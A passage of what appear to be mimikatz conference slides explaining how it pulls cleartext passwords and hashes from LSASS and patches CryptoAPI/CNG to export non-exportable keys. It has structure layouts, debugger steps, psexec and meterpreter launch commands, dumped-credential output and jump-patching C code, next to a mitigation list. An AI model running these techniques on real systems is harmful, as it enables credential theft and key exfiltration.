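def digest_response(username: str, realm: str, password: str, method: str, uri: str,
                    nonce: str, nc: str = None, cnonce: str = None, qop: str = None) -> str:
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2) with qop (RFC 2617),
    or the older MD5(HA1:nonce:HA2) when the server sent no qop (RFC 2069)."""
    h1 = ha1(username, realm, password)
    h2 = ha2(method, uri)
    if qop is None:
        return md5_hex(h1, nonce, h2)
    return md5_hex(h1, nonce, nc, cnonce, qop, h2)


def ha1_for_realms(username: str, password: str, realms) -> dict:
    """HA1 per realm: a stored HA1 for one realm is useless against another."""
    return {realm: ha1(username, realm, password) for realm in realms}


if __name__ == "__main__":
    # RFC 2617 section 3.5 test vector
    print("response =", digest_response(
        "Mufasa", "testrealm@host.com", "Circle Of Life", "GET", "/dir/index.html",
        nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", nc="00000001",
        cnonce="0a4f113b", qop="auth"))
    # Same user and password, two realms: two unrelated HA1 values
    for realm, h in ha1_for_realms("Mufasa", "Circle Of Life",
                                   ["testrealm@host.com", "other.example"]).items():
        print(f"HA1[{realm}] = {h}")
```

Note that the server also controls the nonce and may ask for qop="auth-int", which folds a hash of the request body into HA2: nothing about the response can be precomputed at logon time except HA1, and HA1 itself is realm-bound.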
mimikatz :: sekurlsa :: wdigest - theory
This time we know:
- that WDigest keeps the password in memory "by protocol", for the HA1 digest;
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory).
LsaUnprotectMemory:
- at offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE;
- let's search for it in WDigest... hypothesis verified.
LsaProtectMemory:
- at offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE;
- let's search for it in WDigest... SpAcceptCredentials takes the clear password in its arguments:
  - it protects it with LsaProtectMemory;
  - then updates or inserts the data in the doubly linked list wdigest!l_LogSessList.
    .text:7409D151  _DigestCalcHA1@8          call dword ptr [eax+0B4h]   ; LsaUnprotectMemory
    .text:74096C69  _SpAcceptCredentials@16   call dword ptr [eax+0B0h]   ; LsaProtectMemory
mimikatz :: sekurlsa :: wdigest - workflow
[Figure: LsaEnumerateLogonSessions -> for each LUID: search the wdigest!l_LogSessList linked list for that LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory(Password) -> password in clear.]

    typedef struct _KIWI_WDIGEST_LIST_ENTRY {
        struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
        struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
        DWORD UsageCount;
        struct _KIWI_WDIGEST_LIST_ENTRY *This;
        LUID LocallyUniqueIdentifier;
        [...]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
        [...]
    } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time

sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp

because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how

Actually I've only used a logical (empirical) approach to search for passwords…
- Protocol reading
- Symbol searching
~ Boring ~… let's be more brutal this time: set a WinDBG trap

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp :: how

Let's log in with a Live account on Windows 8
After credential protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert the data into LiveGlobalLogonSessionList (similar to WDigest)

Call stacks caught by the trap:

lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  [...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Our LiveSSP provider
Yeah! Pass-the-Hash capability with Live accounts too… (msv1_0 stores an NTLM hash for them as well)
Live users can log on through RDP via SSO
mimikatz :: sekurlsa :: livessp :: workflow

LsaEnumerateLogonSessions
  -> for each LUID
  -> search the linked list livessp!LiveGlobalLogonSessionList for the LUID (KIWI_LIVESSP_LIST_ENTRY)
  -> follow suppCreds (KIWI_LIVESSP_PRIMARY_CREDENTIAL)
  -> LsaUnprotectMemory
  -> password in clear

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa

Even if we already have tools for normal accounts, aren't you curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos

Let's log in with a normal account
After credential protection, KerbCreateLogonSession calls:
- NT6: KerbInsertOrLocateLogonSession to insert the data into KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession to insert the data into KerbLogonSessionList

Call stacks caught by the trap:

lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  <- Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  <- Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow

LsaEnumerateLogonSessions
  -> for each LUID
  -> RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable (KIWI_KERBEROS_PRIMARY_CREDENTIAL)
  -> LsaUnprotectMemory
  -> password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow

LsaEnumerateLogonSessions
  -> for each LUID
  -> search the linked list kerberos!KerbLogonSessionList for the LUID (KIWI_KERBEROS_LOGON_SESSION)
  -> LsaUnprotectMemory
  -> password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: "hu?"

Ok, it works…
But why?
Not for every logon on NT5 (an unlock can be needed)

From my understanding of Microsoft's explanations:
- no need for passwords in the Kerberos protocol…
- everything is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logic…
- For password auth:
  • the password hash is the shared secret, but the password itself is kept in memory
- For full smartcard auth:
  • No password on the client
  • No hash on the client
  - yet an NTLM hash on the client…
  - the KDC sent it back as a gift
mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way, so that they can be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it

Can it be fun to decrypt outside the process?
- Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too, and "imports" the keys initialized by LSASS
- When we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are inside LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses:
- RC4
- DESx

Key material in lsass (lsasrv.dll), copied by mimikatz into its own loaded lsasrv.dll:
  g_cbRandomKey   DWORD (256)
  g_pRandomKey    -> BYTE[g_cbRandomKey]
  g_pDESXKey      -> BYTE[144]
  g_Feedback      BYTE[8]
mimikatz :: sekurlsa :: LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES
- AES

Key material in lsass (lsasrv.dll), copied by mimikatz:
  InitializationVector   BYTE[16]
  h3DesKey               -> KIWI_BCRYPT_KEY -> KIWI_BCRYPT_KEY_DATA
  hAesKey                -> KIWI_BCRYPT_KEY -> KIWI_BCRYPT_KEY_DATA

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data;   // etc.
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo

Security Packages
  Package          Symbol                                  Type
  tspkg            tspkg!TSGlobalCredTable                 RTL_AVL_TABLE
  wdigest          wdigest!l_LogSessList                   LIST_ENTRY
  livessp          livessp!LiveGlobalLogonSessionList      LIST_ENTRY
  kerberos (nt5)   kerberos!KerbLogonSessionList           LIST_ENTRY
  kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable    RTL_AVL_TABLE
  msv1_0           lsasrv!LogonSessionList                 LIST_ENTRY
                   lsasrv!LogonSessionListCount            ULONG

Protection Keys
  Key     NT 5 symbols
  RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key     NT 6 symbols
  (IV)    lsasrv!InitializationVector
  3DES    lsasrv!h3DesKey
  AES     lsasrv!hAesKey
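The walk is the same for the three LIST_ENTRY packages in the table (wdigest, livessp, kerberos nt5). The following is an added example, not mimikatz code: it builds an in-process replica of wdigest!l_LogSessList with constructed sessions (the LUID 0;234870 and the password reuse the values of the demo output; the second session is made up), protects the password in the entry the way SpAcceptCredentials does, then runs the sekurlsa side: enumerate LUIDs, search the circular list, copy the protected buffer out, unprotect the copy, and read it as an LSA_UNICODE_STRING whose Length is a byte count. The XOR "protection" is a stand-in for LsaProtectMemory/LsaUnprotectMemory so the code runs offline; in LSASS the real functions are the RC4/DESx or 3DES/AES of the previous slides, and the only property the walk relies on is that they are reversible with keys that sit in the same process memory.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not mimikatz code: replica of the wdigest list walk with a toy XOR
 * standing in for LsaProtectMemory/LsaUnprotectMemory. Nothing here reads LSASS. */

typedef uint32_t DWORD;
typedef struct { uint32_t LowPart; int32_t HighPart; } LUID;
/* Length and MaximumLength are BYTE counts; Buffer is UTF-16 and not NUL-terminated. */
typedef struct { uint16_t Length; uint16_t MaximumLength; uint16_t *Buffer; } LSA_UNICODE_STRING;

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    /* the real entry has more fields here ("[...]" on the slide); their size is what
     * changes between Windows builds and what mimikatz's per-build offsets depend on */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_WDIGEST_LIST_ENTRY;

#define USTR_CAP 32                         /* UTF-16 code units per constructed buffer */

/* Stand-in for LsaProtectMemory / LsaUnprotectMemory: symmetric XOR with a constructed key. */
static const uint8_t g_lsa_key[8] = { 0x4b, 0x69, 0x77, 0x69, 0x21, 0x9a, 0x5c, 0xe3 };
static void lsa_xor_protect(void *buf, size_t len) {
    uint8_t *p = buf;
    for (size_t i = 0; i < len; i++) p[i] ^= g_lsa_key[i % sizeof g_lsa_key];
}

/* Widen an ASCII string into a UTF-16LE LSA_UNICODE_STRING over a caller-owned buffer. */
static void set_ustr(LSA_UNICODE_STRING *s, uint16_t *buf, const char *ascii) {
    size_t n = strlen(ascii);
    if (n > USTR_CAP) n = USTR_CAP;
    for (size_t i = 0; i < n; i++) buf[i] = (uint16_t)(unsigned char)ascii[i];
    s->Length = (uint16_t)(n * 2); s->MaximumLength = USTR_CAP * 2; s->Buffer = buf;
}

/* Narrow a UTF-16 LSA_UNICODE_STRING to a C string (ASCII-range demo data only). */
static int ustr_to_ascii(const LSA_UNICODE_STRING *s, char *out, size_t cap) {
    size_t n = s->Length / 2;                   /* bytes -> code units */
    if (n + 1 > cap) return 0;
    for (size_t i = 0; i < n; i++) out[i] = (char)s->Buffer[i];
    out[n] = 0;
    return 1;
}

static KIWI_WDIGEST_LIST_ENTRY g_head;          /* plays wdigest!l_LogSessList: circular, head is a sentinel */
static KIWI_WDIGEST_LIST_ENTRY g_entries[2];
static uint16_t g_bufs[2][3][USTR_CAP];
static int g_built;

/* What SpAcceptCredentials does with the clear password: protect it, insert the entry at the tail. */
static void accept_credentials(KIWI_WDIGEST_LIST_ENTRY *e, uint16_t bufs[3][USTR_CAP],
                               LUID luid, const char *user, const char *dom, const char *pw) {
    memset(e, 0, sizeof *e);
    e->UsageCount = 1; e->This = e; e->LocallyUniqueIdentifier = luid;
    set_ustr(&e->UserName, bufs[0], user);
    set_ustr(&e->Domaine,  bufs[1], dom);
    set_ustr(&e->Password, bufs[2], pw);
    lsa_xor_protect(e->Password.Buffer, e->Password.Length);   /* LsaProtectMemory */
    e->Flink = &g_head; e->Blink = g_head.Blink;
    g_head.Blink->Flink = e; g_head.Blink = e;
}

static void build_list(void) {
    if (g_built) return;
    g_head.Flink = g_head.Blink = &g_head;
    /* constructed sessions; the first reuses the demo's LUID 0;234870 and password */
    accept_credentials(&g_entries[0], g_bufs[0], (LUID){ 234870, 0 }, "Gentil Kiwi", "vm-w8-rp-x", "waza1234");
    accept_credentials(&g_entries[1], g_bufs[1], (LUID){ 0x1a2b3c, 0 }, "user2", "vm-w8-rp-x", "s3cret");
    g_built = 1;
}

/* "search linked list for LUID": follow Flink from the head until we are back at the head. */
static KIWI_WDIGEST_LIST_ENTRY *find_by_luid(LUID luid) {
    build_list();
    for (KIWI_WDIGEST_LIST_ENTRY *e = g_head.Flink; e != &g_head; e = e->Flink)
        if (e->LocallyUniqueIdentifier.LowPart == luid.LowPart &&
            e->LocallyUniqueIdentifier.HighPart == luid.HighPart)
            return e;
    return NULL;                                /* mimikatz prints "n.t. (LUID KO)" here */
}

/* The sekurlsa side for one LUID: copy the protected bytes out, unprotect the copy, read it as
 * text. NULL when the LUID has no wdigest entry. Static buffer: demo only. */
const char *wdigest_password_for(uint32_t luid_low) {
    static char out[USTR_CAP + 1];
    KIWI_WDIGEST_LIST_ENTRY *e = find_by_luid((LUID){ luid_low, 0 });
    if (!e) return NULL;
    uint16_t tmp[USTR_CAP];
    memcpy(tmp, e->Password.Buffer, e->Password.Length);  /* read only: the "LSASS" side is not modified */
    lsa_xor_protect(tmp, e->Password.Length);             /* LsaUnprotectMemory */
    LSA_UNICODE_STRING clear = { e->Password.Length, e->Password.MaximumLength, tmp };
    int ok = ustr_to_ascii(&clear, out, sizeof out);
    memset(tmp, 0, sizeof tmp);
    return ok ? out : NULL;
}

/* 1 if the bytes stored in the list differ from `clear` widened (i.e. are still protected). */
int wdigest_stored_differs(uint32_t luid_low, const char *clear) {
    KIWI_WDIGEST_LIST_ENTRY *e = find_by_luid((LUID){ luid_low, 0 });
    if (!e) return -1;
    uint16_t wide[USTR_CAP]; LSA_UNICODE_STRING w;
    set_ustr(&w, wide, clear);
    return w.Length != e->Password.Length || memcmp(wide, e->Password.Buffer, w.Length) != 0;
}

int main(void) {
    uint32_t luids[] = { 234870, 0x1a2b3c, 4242 };       /* stand-in for LsaEnumerateLogonSessions */
    for (size_t i = 0; i < sizeof luids / sizeof luids[0]; i++) {
        const char *pw = wdigest_password_for(luids[i]);
        printf("LUID 0;%u  wdigest : %s\n", (unsigned)luids[i], pw ? pw : "n.t. (LUID KO)");
    }
    return 0;
}
```

The two details that bite in practice are both visible here: the list is circular with the head as sentinel (a walk that tests for NULL never terminates), and LSA_UNICODE_STRING.Length counts bytes, not characters, and the buffer carries no terminator.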
mimikatz :: sekurlsa :: memo

Some commands:
  mimikatz privilege::debug sekurlsa::logonPasswords full exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
  http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Request to ACTIVATE privilege : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentication Id        : 0;234870
Authentication package   : NTLM
Primary user             : Gentil Kiwi
Authentication domain    : vm-w8-rp-x
        msv1_0 :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * LM hash   : d0e9aee149655a6075e4540af1f22d3b
         * NTLM hash : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234
        wdigest :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234
        tspkg :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234
        livessp :
         * n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do

Basics
- No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
- No admin rights, system rights, debug privilege (…)
- Disable local admin accounts
- Strong passwords (haha, it was a joke: useless against this, the clear text is in memory anyway)
- For privileged accounts, network logon instead of interactive logon (when possible)
- Audit: pass-the-hash leaves traces and can lock accounts
- No admin rights, system rights, debug privilege, even for VIPs
- Use a separate network (or forest) for privileged tasks

More in depth
- Force strong authentication (SmartCard & Token) $$$ €€€
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- Nothing exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
- Stop using shared secrets for authentication, push public/private stuff (like keys ;))
- Take every opportunity to drop backward compatibility
- Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?

A little module that I wrote to:
- play with the Windows Cryptographic API, CNG and RSA keys
- automate the export of certificates/keys
  • even those which are "not" exportable

What the crypto module can do:
- List
  • Providers
  • Stores
  • Certificates
  • Keys
- Export
  • Certificates
    - public part in DER format
    - with private keys in PFX format
  • Private keys in PVK format (it's cool, OpenSSL can deal with it too)
- Patch
  • CryptoAPI in the mimikatz context
  • CNG in the LSASS context (again!)

(module: mod_mimikatz_crypto)
mimik
atz :: crypto :: how it's protected

Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  • at least not without the master keys and/or passwords of the users
Computers/users can load their own keys because they have enough secrets to do it (e.g. an open session)
- Yes, a computer/server does open a "session"

Export/usage can be limited by:
- Password
- Popup
  (password and popup are a constraint for most users, and unavailable for computer keys)
- Export/Archive flag not present

certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." - http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard readers, …
- cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API… inside their own address space
mimikatz :: crypto :: capi :: how it's exported ( level)

Process -> CryptoAPI and RSA CSP (same process):
  Load Private Key  -> DPAPI decode
  Ask to export Key -> Exportable?
    yes -> Exported Key
    no  -> NTE_BAD_KEY_STATE
  (diagram label: PLAYSKOOL)
mimikatz :: crypto :: patchcapi :: because I own my process

When we want to export a certificate with its private key (or only the key), it goes through rsaenh!CPExportKey
This function does all the work to prepare the export and checks whether the key is exportable

mimikatz # crypto::exportCertificates
Location : CERT_SYSTEM_STORE_CURRENT_USER/My
 - Benjamin Delpy
   Key container  : 470ADFBA-8718-4014-B05E-B30776B75A03
   Provider       : Microsoft Enhanced Cryptographic Provider v1.0
   Type           : AT_KEYEXCHANGE
   Exportable     : NO
   Key size       : 2048
   Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
   Public export to  'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificate 0 ================
Serial Number: 112169417a1c3ef46a301f99385f50680fa0
Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Subject: CN=Benjamin Delpy, C=FR
Non-root Certificate
Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

Exportable: no, says the CSP (NTE_BAD_KEY_STATE)
mimikatz :: crypto :: patchcapi :: because I own my process

So what? A module in my own process tells me I can't do something? CryptoAPI is in my memory space: let's patch it!
I wrote "4" bytes in my memory space:

.text:0AC0B7CB  0F 85 33 C7 FF FF   jnz continue_key_export_or_archive
  becomes
.text:0AC0B7CB  90                  nop
.text:0AC0B7CC  E9 33 C7 FF FF      jmp continue_key_export_or_archive

.text:0AC1F749  0F 85 B6 3B FF FF   jnz continue_key_export_or_archive_prepare
  becomes
.text:0AC1F749  90                  nop
.text:0AC1F74A  E9 B6 3B FF FF      jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time

Import, export, import as not exportable… export
mimikatz :: crypto :: patchcapi :: limitations

Because:
- I'm lazy
- in the majority of cases I've seen RSA keys in real-life use
  • Elliptic Curve a little…

mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
… all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time key operations are not made in the "user" process context
The process uses RPC to call the "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
- It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported ( level)

Process -> CNG --RPC--> KeyIso service (LSASS process):
  Load Private Key  -> DPAPI decode
  Ask to export Key -> Exportable?
    yes -> Exported Key
    no  -> NTE_NOT_SUPPORTED
  (diagram label: PLAYSKOOL)
  LSASS on NT6: system-protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass(keyiso) ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks whether the key is exportable

mimikatz # crypto::exportKeys [user]
CNG keys
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
   Exportable : NO
   Key size   : 2048
   Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO mod_cryptong::getPrivateKeyPrivateKeyBlobToPVK (0x80090029) The requested operation is not supported.

Exportable: no, says the KSP (NTE_NOT_SUPPORTED)
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

This time the checks and the keys are in the LSASS process… and what?
I wrote "1" byte in LSASS memory space…

.text:6C815210  75 1C   jnz short continue_key_export
  becomes
.text:6C815210  EB 1C   jmp short continue_key_export
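Both patches, the 4 bytes in rsaenh!CPExportKey and the 1 byte in ncrypt!SPCryptExportKey, are the same operation: a conditional jnz becomes an unconditional jump to the same target, so the "not exportable" branch is never taken. The added example below is mine, not mimikatz code: it does that rewrite on constructed byte buffers holding the opcodes from the slides (no process memory is touched), and decodes the branch target before and after to show why the displacement can stay untouched: nop + jmp rel32 ends on the same byte as the 6-byte jnz rel32, and jmp rel8 has the same length as jnz rel8. Only those two encodings are handled.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Added example, not mimikatz code: the two patch shapes from the slides applied to
 * constructed buffers, with a before/after check of the branch target. */

static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Decode the target of the branch at code[off] for a buffer mapped at `base`.
 * Handles only what the patches touch: jnz rel32 (0F 85) and its patched form nop;jmp rel32
 * (90 E9), jnz rel8 (75) and its patched form jmp rel8 (EB). Returns 0 when unrecognised. */
int branch_target(const uint8_t *code, size_t off, uint32_t base, uint32_t *target) {
    const uint8_t *p = code + off;
    uint32_t ip = base + (uint32_t)off;                 /* address of the decoded instruction */
    if (p[0] == 0x0F && p[1] == 0x85) { *target = ip + 6 + rd32le(p + 2); return 1; }  /* rel32 counts from the end of the 6-byte jnz */
    if (p[0] == 0x90 && p[1] == 0xE9) { *target = ip + 6 + rd32le(p + 2); return 1; }  /* nop (1) + jmp rel32 (5) end on the same byte */
    if (p[0] == 0x75 || p[0] == 0xEB) { *target = ip + 2 + (uint32_t)(int32_t)(int8_t)p[1]; return 1; }
    return 0;
}

/* Make the conditional jump at code[off] unconditional. Returns bytes changed, 0 if not a jnz. */
int force_jump(uint8_t *code, size_t off) {
    uint8_t *p = code + off;
    if (p[0] == 0x0F && p[1] == 0x85) { p[0] = 0x90; p[1] = 0xE9; return 2; }   /* jnz rel32 -> nop; jmp rel32 */
    if (p[0] == 0x75)                { p[0] = 0xEB;              return 1; }   /* jnz rel8  -> jmp rel8 */
    return 0;
}

/* Patch with a target check. Returns bytes changed, or -1 if the site is not a jnz
 * or the rewrite moved the target (it never should; verify anyway before writing code). */
int patch_site(uint8_t *code, size_t off, uint32_t base) {
    uint32_t before, after;
    if (!branch_target(code, off, base, &before)) return -1;
    int n = force_jump(code, off);
    if (n == 0) return -1;
    if (!branch_target(code, off, base, &after) || after != before) return -1;
    return n;
}

/* rsaenh!CPExportKey: the two "is this key exportable?" checks (slide: 4 bytes written). */
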